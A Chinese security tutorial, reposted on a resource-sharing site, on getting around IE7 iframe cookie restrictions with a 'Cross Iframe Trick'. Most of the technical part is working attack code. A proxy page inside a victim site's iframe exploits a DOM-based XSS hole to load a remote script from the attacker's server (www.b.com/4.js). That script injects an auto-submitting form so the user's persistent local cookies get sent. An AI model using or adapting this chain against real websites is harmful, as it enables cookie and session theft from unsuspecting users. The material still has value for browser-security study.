当前位置:资源分享吧 > 教你如何突破IE安全限制获取iframe子框架内的本地cookie(图)
也想出现在这里? 联系我们

教你如何突破IE安全限制获取iframe子框架内的本地cookie(图)

作者 : 小编 本文共4775个字,预计阅读时间需要12分钟 发布时间: 2021-06-3 共2.8K人阅读
也想出现在这里? 联系我们

我的测试环境是: IE 7 (7.0.5730.13)

以下所有的内容全部经过我在IE7中测试,是真实有效的结果。

Iframe的限制:
因为iframe这个玩意比较特殊,所以浏览器对它一般都有一些限制。

首先父窗口不能控制子窗口的js,只能读取一些对象;子窗口也不能使用父窗口的js,也只能读部分对象,更多的比如document啥的都限制了。

关系如下:

– iframe's should not be able to view content/cookies from another domain
– iframe children CAN view certain properties and execute certain behaviors
– parent.window.blur
– parent.window.opener
– parent.window.length
– others
– iframe children CAN redirect the parent frame to a new location (great for phishing)
– parent.location.href
– parent.window.location
对于有些利用子窗口执行父窗口js的方法是限制的
比如,在子窗口里可以这么使用:
parent.location.href="http://www.sohu.com";

上面的语句将把父窗口重新定义到sohu的网站去.

但是如果想执行js,或者是读取document对象,则会被拒绝访问
parent.location.href=new String("javascript:alert(document.cookie)");
parent.location.href=new String("javascript:alert(1)");

像这两条都会被拒绝。

对于iframe,Firefox3 居然是不限制本地cookie发送的!也就是说,在Firefox环境里,使用iframe包含一个远程页面,是会将保存在本地的cookie发送出去的,这使得CSRF会非常之方便。

但是IE不同,对于IE环境中,img和iframe标签都只能发送session cookie,无法发送本地cookie,所以很多时候CSRF会失败,这也会给XSS带来很大的麻烦,比如会使得XSRF更困难一些。

鉴于Firefox一点挑战都没有,所以今天主要研究的对象是IE。

在IE环境下,程序员们一般都是使用P3P协议来获取跨域cookie的,但是P3P也要求我们改写HTTP头,更麻烦,在这里,我纯粹使用一些脚本的技巧来突破这些限制。

突破IFRAME限制的思路:(以下都是在IE环境中)
由于页面里的iframe都是发送的session cookie,所以子框架页面里本身是只有一个session cookie的,我们无法通过在子框架里执行js的方法来获取本地cookie,无中生有的事情是干不出来的。

了解这一原理后,思路就很明确了:想办法新起一个不受限制的窗口,从而获取本地cookie。

具体来说,有这么两个办法:
1、 使用window.open打开一个新窗口
2、 回到父窗口,让其打开一个新窗口

在子框架中,使用window.open()确实可以发送本地cookie,但是问题是浏览器一般会限制页面弹窗口,会被拦截,所以这个方法比较囧~~,不是个好办法。

而第二个办法,回到父窗口去打开新窗口,就涉及到一个突破iframe执行脚本的问题,而这个问题在我的前一篇Cross Iframe Trick 里已经解决了,所以我们的方法就呼之欲出了。

利用Cross Iframe Trick突破iframe限制获取子框架cookie:

Cross Iframe的最大贡献就在于他可以绕过前面提到的iframe的限制,在父域或者子框架里获取对象,执行脚本。

当一个页面很难突破时,如果他包含了一个存在弱点的iframe页面,则可能会带来灾难性的结果。

我相信真正精通脚本攻击的人是能够看到它的用处和优势的。

环境如下:(绑定127.0.0.1 www.baidu.com)
http://www.a.com/1.html 是我们要攻击的页面,它包含了一个存在弱点的iframe,用户只会去浏览这个页面

http://www.baidu.com/3.html 是我们已经控制的页面,他作为一个iframe被1.html所包含。在这里是iframe proxy

http://www.a.com/4.html 是www.a.com上的一个存在XSS漏洞的页面,一般情况下用户不会去访问它!

http://www.b.com/4.js 这是攻击者自己的服务器上的一个恶意脚本,将被XSS攻击远程载入4.html中。

由于用户只会浏览www.a.com/1.html,所以我们要通过脚本攻击,从www.a.com/1.html里获取用户在www.baidu.com/3.html的本地cookie。

www.a.com/1.html的代码如下:
———————————- 我是聪明的分割线 ——————————————-
<script>
// 函数tt1 ,在最后将被4.html注入参数
function tt1(fvck){
alert("tt1() and args= " fvck);
document.write("<input id=\\"bbb\\" value=\\'test1" fvck "\\' >");
}
</script>

<body>
<iframe id="tt2_3" src="http://www.baidu.com/3.html" width="300" height="300" ></iframe>
</body>
———————————- 我是聪明的分割线 ——————————————-

它包含了一个iframe页面

www.baidu.com/3.html 的代码为:
———————————- 我是聪明的分割线 ——————————————-
<html>
<body>

<script>
//parent.location.href=new String("javascript:alert(document.cookie)");
//parent.location.href="http://www.sohu.com";

alert("3.html in iframe and cookie=" document.cookie);

// iframe proxy: 创建一个动态iframe,并利用4.html里的XSS漏洞
var tt1_4 = document.createElement("iframe");
tt1_4.src = "http://www.A.com/4.html#' ><script src=\\"http://www.b.com/4.js\\"><\\/script><\\'";
document.body.appendChild(tt1_4);
</script>

</body>
</html>
———————————- 我是聪明的分割线 ——————————————-

3.html是我们的iframe proxy,利用它来完成在www.a.com里执行脚本的工作。

www.a.com/4.html 的代码为:
———————————- 我是聪明的分割线 ——————————————-
<html>

<script>
// 一个基于DOM的XSS漏洞
document.write("<input id=\\"aaa\\" value=\\'test4" window.location.href "\\' >");
//window.open("http://www.baidu.com/4.html"); 会带上cookie
</script>

<body>
This is 4.html!
<!– 把这里的注释去掉可以用来测试,这样发送的还是session cookie!
<form id="form1" method="post" action="http://www.baidu.com/2.html" >
<img src="/Article/UploadFiles/200809/20080902083122466.jpg" onload=submitpost4();>
</form>
<script>function submitpost4(){ document.forms[0].submit(); }</script>
–>
</body>
</html>
———————————- 我是聪明的分割线 ——————————————-

www.b.com/4.js 的代码为:
———————————- 我是聪明的分割线 ——————————————-
alert("4.js is loaded!");

top.tt1('\\'><form id=\\"form1\\" method=\\"post\\" action=\\"http://www.baidu.com/2.html\\" ><img src=\\"/Article/UploadFiles/200809/20080902083122466.jpg\\" onload=submitpost4();></form><script>function submitpost4(){ document.forms[0].submit(); }</script><\\!– \\'');

———————————- 我是聪明的分割线 ——————————————-

4.js才是我们真正利用XSS漏洞和Cross Iframe Trick来新起一个窗口,从而获取本地cookie的方法。

www.baidu.com/2.html的代码很简单,他的作用是查看当前的cookie:
———————————- 我是聪明的分割线 ——————————————-
<script>
alert("2.html cookie=" document.cookie);
</script>

———————————- 我是聪明的分割线 ——————————————-

在这里攻击流程是这样的:
www.a.com/1.html —-iframe—-> www.baidu.com/3.html —-动态iframe—> www.a.com/4.html 的XSS漏洞 ——> 在www.a.com域中远程加载www.b.com/4.js

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 教你如何突破IE安全限制获取iframe子框架内的本地cookie(图)

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html
小编

小编 VIP

分享到:

发表评论

相关推荐

  • 2676本站运营(天)
  • 62446用户总数
  • 26548资源数(个)
  • 2近7天更新(个)
  • 82301资源大小(GB)
加入VIP获取全站资源

「资源分享吧」 ZYFX8.CN

国内极具人气的网络源码资源交流学习平台
下载源码文章,学软件教程,找灵感素材,尽在「资源分享吧」
按Ctrl+D收藏本站

找资源就上「 资源分享吧 」

WWW.ZYFX8.CN

资源分享吧(www.zyfx8.cn)是一家专门做精品素材的网站,网站以网站源码、网站模板、网页特效为主要内容,以“共享创造价值”为理念,以“尊重原创”为准则。

本站导航
更多导航
Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
资源分享吧(www.zyfx8.cn)是一家专门做精品素材的网站,以“共享创造价值”为理念,以“尊重原创”为准则。
开通VIP 享更多特权,建议使用QQ登录
账号登录/注册
QQ登录
微博登录